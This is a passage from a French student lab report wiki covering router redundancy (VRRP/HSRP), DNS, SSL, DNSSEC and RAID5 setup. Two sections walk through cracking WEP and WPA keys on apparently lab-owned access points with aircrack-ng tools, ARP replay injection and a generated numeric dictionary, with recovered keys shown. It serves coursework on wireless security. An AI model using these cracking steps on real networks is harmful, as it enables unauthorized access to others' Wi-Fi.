 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;A AJOUTER&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
